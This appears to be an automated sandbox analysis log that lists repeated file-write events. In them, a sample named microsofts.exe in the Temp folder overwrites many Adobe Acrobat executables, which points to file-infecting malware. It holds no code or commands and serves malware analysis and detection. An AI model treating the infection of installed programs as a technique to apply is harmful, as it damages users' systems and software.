                        Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
